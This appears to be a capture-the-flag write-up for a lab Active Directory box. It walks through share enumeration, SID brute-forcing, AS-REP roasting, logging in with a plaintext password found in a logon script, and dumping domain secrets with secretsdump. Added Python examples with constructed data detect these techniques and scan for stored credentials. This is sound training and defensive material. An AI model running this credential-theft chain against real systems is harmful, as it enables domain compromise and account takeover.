Roasted
sudo nmapAutomator.sh 10.10.22.148 all
It looks like we have read permissions on the business-anonymous and enterprise-anonymous shares.
crackmapexec smb 10.10.22.148 -u 'Anonymous' -p '' --shares
Let's download the files and check whether there is anything interesting.
There is not much in them apart from employee names, which could still be useful for further enumeration.
Now that we know anonymous login works, we can use Impacket's lookupsid, which brute-forces Windows SIDs to identify users and groups on the remote target.
lookupsid.py Anonymous@10.10.22.148 >> users.txt
Extract usernames with vim magic.
Let's use Impacket's GetNPUsers to list, and request TGTs for, those users that have the 'Do not require Kerberos pre-authentication' property set (UF_DONT_REQUIRE_PREAUTH).
GetNPUsers.py vulnnet-rst.local/ -dc-ip 10.10.22.148 -usersfile users.txt
Great, it looks like we have the hash for the t-skid user. We can use john to crack it.
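The condition GetNPUsers relies on is a single bit in userAccountControl, so it is easy to audit for and to spot in domain controller logs. The following is an added example written for this page (not part of the original write-up): an LDAP-side audit of the UF_DONT_REQUIRE_PREAUTH flag plus a log-side check of Kerberos TGT request events (Event ID 4768) for requests that were issued without pre-authentication. The account and event records are constructed sample data, with invented UAC values.

```python
# Added example (defender side), not part of the original write-up.
# Two checks for the AS-REP roasting condition used above:
#   1. an LDAP-side audit of userAccountControl for UF_DONT_REQUIRE_PREAUTH
#   2. a log-side check of Kerberos TGT request events (Event ID 4768)
# All account and event data below is constructed sample data.

UF_ACCOUNTDISABLE = 0x0002
UF_NORMAL_ACCOUNT = 0x0200
UF_DONT_REQUIRE_PREAUTH = 0x400000  # "Do not require Kerberos preauthentication"

# Constructed (sAMAccountName, userAccountControl) records, shaped like the
# result of an LDAP search over user objects; the UAC values are invented.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "t-skid",
     "userAccountControl": UF_NORMAL_ACCOUNT | UF_DONT_REQUIRE_PREAUTH},
    {"sAMAccountName": "a-whitehat",
     "userAccountControl": UF_NORMAL_ACCOUNT},
    {"sAMAccountName": "old-svc",
     "userAccountControl": UF_NORMAL_ACCOUNT | UF_DONT_REQUIRE_PREAUTH | UF_ACCOUNTDISABLE},
    {"sAMAccountName": "svc-backup",
     "userAccountControl": UF_NORMAL_ACCOUNT | 0x10000},  # DONT_EXPIRE_PASSWD only
]


def asrep_roastable(accounts, include_disabled=False):
    """Return, sorted, the names of accounts whose UAC has DONT_REQUIRE_PREAUTH set.

    Disabled accounts are skipped by default: the KDC refuses them a TGT, so
    they cannot be roasted, but they are still worth cleaning up
    (pass include_disabled=True to list them too).
    """
    hits = []
    for acct in accounts:
        uac = acct["userAccountControl"]
        if not uac & UF_DONT_REQUIRE_PREAUTH:
            continue
        if uac & UF_ACCOUNTDISABLE and not include_disabled:
            continue
        hits.append(acct["sAMAccountName"])
    return sorted(hits)


def remediated_uac(uac):
    """UAC value with only the pre-auth bypass cleared; every other flag is kept."""
    return uac & ~UF_DONT_REQUIRE_PREAUTH


# Constructed, abbreviated 4768 ("A Kerberos authentication ticket (TGT) was
# requested") events. PreAuthType 0 means the KDC issued the TGT without any
# pre-authentication, which is exactly the exchange GetNPUsers performs;
# 0x17 is RC4, the ticket encryption type such tools usually ask for.
SAMPLE_4768_EVENTS = [
    {"TargetUserName": "t-skid", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.22.5"},
    {"TargetUserName": "a-whitehat", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.22.9"},
    {"TargetUserName": "svc-backup", "PreAuthType": "2",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.22.7"},
]


def asrep_roast_events(events):
    """Return 4768 events for TGTs issued without pre-authentication.

    RC4 (0x17) on such an event is an extra signal but not a requirement: an
    AES-encrypted AS-REP obtained without pre-auth is still crackable offline,
    only slower.
    """
    return [e for e in events if e["PreAuthType"] == "0"]


if __name__ == "__main__":
    print("AS-REP roastable accounts:", asrep_roastable(SAMPLE_ACCOUNTS))
    for ev in asrep_roast_events(SAMPLE_4768_EVENTS):
        print(f"4768 without pre-auth: {ev['TargetUserName']} from {ev['IpAddress']}")
```

In a real environment the account records would come from an LDAP query such as `(userAccountControl:1.2.840.113556.1.4.803:=4194304)` (4194304 is 0x400000), and the 4768 events from the domain controllers' Security logs; the remediation is to write back the value `remediated_uac` computes, or simply to untick the option in the account's properties.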
Let's check if we have any new access in SMB.
Under the NETLOGON share there is a ResetPassword.vbs file.
The file contains credentials in plaintext:
a-whitehat:bNdKVkjv3RR9ht
evil-winrm -i 10.10.22.148 -u a-whitehat -p 'bNdKVkjv3RR9ht'
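Scripts left on NETLOGON and SYSVOL are readable by every domain user, so a plaintext password in one of them is a credential for anyone who looks. The following is an added example written for this page (not the write-up's own tooling): a small scanner that walks already-fetched script contents and reports where a hard-coded credential sits, recording only the indicator and the secret's length rather than the value itself. The files and values are constructed; the ResetPassword.vbs content is an invented stand-in, not the script from the target.

```python
import re
from dataclasses import dataclass

# Added example (defender side), not part of the original write-up: a scanner
# for plaintext credentials in logon scripts fetched from NETLOGON/SYSVOL-style
# shares. The files and values below are constructed; the ResetPassword.vbs
# text is an invented stand-in, not the script from the target.
SAMPLE_FILES = {
    "NETLOGON/ResetPassword.vbs": "\n".join([
        "Option Explicit",
        "Dim strUserNTName, strPassword, objUser",
        'strUserNTName = "svc-constructed"',
        'strPassword = "CONSTRUCTED_PLACEHOLDER_PW"',
        'Set objUser = GetObject("WinNT://" & strUserNTName)',
        "objUser.SetPassword strPassword",
    ]),
    # harmless drive mapping, nothing to flag
    "NETLOGON/logon.bat": "@echo off\r\nnet use H: \\\\fileserver\\home /persistent:no\r\n",
    "SYSVOL/scripts/map.ps1": "\n".join([
        "$cred = Get-Credential",  # prompts interactively; nothing stored
        '$pw = ConvertTo-SecureString "Constructed1!" -AsPlainText -Force',
        "New-PSDrive -Name X -PSProvider FileSystem -Root \\\\fs\\x -Credential $cred",
    ]),
}

# Each pattern yields (indicator, quote, secret). The secret group is only used
# to measure length; a Finding never carries the value itself.
CRED_PATTERNS = [
    # VBScript / batch / PowerShell style assignments: strPassword = "...", $pwd='...'
    re.compile(r"""(?i)\$?(\w*(?:pass(?:word|wd)?|pwd|secret)\w*)\s*=\s*(["'])(.+?)\2"""),
    # PowerShell plaintext-to-SecureString conversion
    re.compile(r"""(?i)(ConvertTo-SecureString)\s+(["'])(.+?)\2\s+-AsPlainText"""),
]


@dataclass(frozen=True, order=True)
class Finding:
    path: str
    line: int
    indicator: str   # variable name or cmdlet that matched
    secret_len: int  # length only; the value is deliberately not kept


def scan_text(path, text):
    """Scan one file's contents; at most one finding per line."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for pat in CRED_PATTERNS:
            m = pat.search(line)
            if m:
                findings.append(Finding(path, lineno, m.group(1), len(m.group(3))))
                break
    return findings


def scan_files(files):
    """files: mapping of share-relative path -> already-fetched file contents."""
    results = []
    for path, text in files.items():
        results.extend(scan_text(path, text))
    return sorted(results)


if __name__ == "__main__":
    for f in scan_files(SAMPLE_FILES):
        print(f"{f.path}:{f.line}: {f.indicator} assigned a {f.secret_len}-char literal")
```

The scanner is deliberately conservative (it requires a quoted literal right after the assignment, so `strPassword = InputBox(...)` is not reported) and can be pointed at a local copy of the share with a few lines of `os.walk`. The durable fix for the finding itself is to stop storing the secret in the script at all: a scheduled task or service running as a managed service account, or a script that prompts with Get-Credential, removes the need for the literal.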
Impacket's secretsdump.py performs various techniques to dump secrets from the remote machine without executing any agent. The techniques include reading SAM and LSA secrets from the registry, dumping NTLM hashes, plaintext credentials and Kerberos keys, and dumping NTDS.dit. The following command will attempt to dump all secrets from the target using those techniques.
secretsdump.py 'vulnnet-rst.local/a-whitehat@10.10.22.148'
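When the target is a domain controller, secretsdump's NTDS.dit path does not copy the database file; it asks the DC to replicate the account secrets to the caller (DCSync), which requires the directory replication control-access rights. With SACL auditing enabled on the domain object, exercising those rights produces Event ID 4662 with the right's GUID in the Properties field, which gives defenders a clean signal: replication requests should only ever come from other domain controllers and a short list of known replication services. The following is an added example written for this page (not part of the write-up) that filters constructed 4662 events on that basis.

```python
# Added example (defender side), not part of the original write-up: flag
# directory-replication access (DCSync) that does not come from a domain
# controller or a known replication service. The events below are constructed
# sample data shaped like the Properties/AccessMask fields of Event ID 4662.

# Control-access rights needed to replicate secrets from a DC.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_RIGHTS = (DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL)

ADS_RIGHT_DS_CONTROL_ACCESS = 0x100  # AccessMask value for an extended right

# "00000000-..." below is a constructed, unrelated property GUID.
SAMPLE_4662_EVENTS = [
    {"SubjectUserName": "a-whitehat", "SubjectDomainName": "VULNNET-RST",
     "AccessMask": "0x100",
     "Properties": f"%%7688 {{{DS_REPLICATION_GET_CHANGES}}} {{{DS_REPLICATION_GET_CHANGES_ALL}}}"},
    {"SubjectUserName": "WIN-DC01$", "SubjectDomainName": "VULNNET-RST",
     "AccessMask": "0x100",
     "Properties": f"%%7688 {{{DS_REPLICATION_GET_CHANGES}}}"},
    {"SubjectUserName": "svc-aadconnect", "SubjectDomainName": "VULNNET-RST",
     "AccessMask": "0x100",
     "Properties": f"%%7688 {{{DS_REPLICATION_GET_CHANGES_ALL}}}"},
    {"SubjectUserName": "a-whitehat", "SubjectDomainName": "VULNNET-RST",
     "AccessMask": "0x100",
     "Properties": "%%7688 {00000000-0000-0000-0000-000000000001}"},
]


def dcsync_candidates(events, known_dcs=frozenset(), allowlist=frozenset()):
    """Return (user, domain) pairs that exercised a replication right.

    known_dcs: machine account names of the domain controllers (e.g. "WIN-DC01$").
    allowlist: service accounts that legitimately replicate (e.g. Azure AD Connect).
    Matching on an explicit DC list is preferred over trusting the '$' suffix,
    since any computer account carries it.
    """
    hits = []
    for e in events:
        if int(e["AccessMask"], 16) & ADS_RIGHT_DS_CONTROL_ACCESS == 0:
            continue
        props = e["Properties"].lower()
        if not any(guid in props for guid in REPLICATION_RIGHTS):
            continue
        user = e["SubjectUserName"]
        if user in known_dcs or user.lower() in allowlist:
            continue
        hits.append((user, e["SubjectDomainName"]))
    return hits


if __name__ == "__main__":
    for user, domain in dcsync_candidates(
        SAMPLE_4662_EVENTS,
        known_dcs={"WIN-DC01$"},
        allowlist={"svc-aadconnect"},
    ):
        print(f"replication right used by non-DC principal {domain}\\{user}")
```

The filter only works if the domain object's SACL audits control-access by "Everyone" and the Directory Service Access subcategory is enabled; without that, no 4662 is written for the replication call. Reducing who holds the two rights in the first place (they should be granted to domain controllers and the replication service accounts only, never to ordinary admins' day-to-day accounts) is the corresponding prevention step.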